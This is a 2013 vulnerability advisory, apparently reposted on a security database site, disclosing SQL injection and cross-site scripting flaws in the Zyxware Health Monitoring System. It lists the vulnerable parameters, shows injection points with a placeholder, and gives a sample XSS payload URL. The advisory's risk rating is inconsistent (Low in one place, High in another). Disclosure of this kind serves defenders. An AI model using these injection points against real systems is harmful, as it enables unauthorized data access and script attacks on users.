Zyxware Health Monitoring System

2013.10.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##################### ______ __ ______ / \ / | / \ /000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______ 00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / | 00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/ 000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 | / \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____ 00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 | 000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/ ##################### Product: Zyxware Health Monitoring System Product Version: 1.0.2 Vendor: Zyxware Technologies Vendor Notification: Sept 3, 2013 Public Disclosure: Sept 9, 2013 Vulnerability Type: Sql Injection, XSS Risk Level: High Discovered and Provided By: Sarahma Security Sarahma Global Informatika Website : wwww.sarahma.co.id Email : research@sarahma.co.id ##################### ======================== SQL Injection ======================== Found on http://localhost/healthmonitor/maps/diseaseinfo.php Parameter : strDiseaseName http://localhost/healthmonitor/maps/diseaseinfo.php?strDiseaseName=1'{SQL_HERE} Found On http://localhost/healthmonitor/maps/summary.php Parameter : opt http://localhost/healthmonitor/maps/summary.php?opt=1'{SQL_HERE}&type=Dist ======================== XSS Vulnerability ======================== Found On : http://localhost/healthmonitor/maps/diseaseinfo.php parameter : rightContent http://localhost/healthmonitor/maps/googlemap.php parameter : mapheight and mapwidth http://localhost/healthmonitor/maps/khmheading.php parameter : imageheight http://localhost/healthmonitor/maps/moreinfo.php parameter : rightContent http://localhost/healthmonitor/maps/summary.php parameter : opt and rightContent Example : http://localhost/healthmonitor/maps/khmheading.php?imageheight=0&imagePadding=%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E ======================== Solution : ======================== No Update Until This Advisory published ======================== Timeline: ======================== 2013-09-03 Provided details to vendor 2013-09-08 No Response From vendor 2013-09-09 Advisory published


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top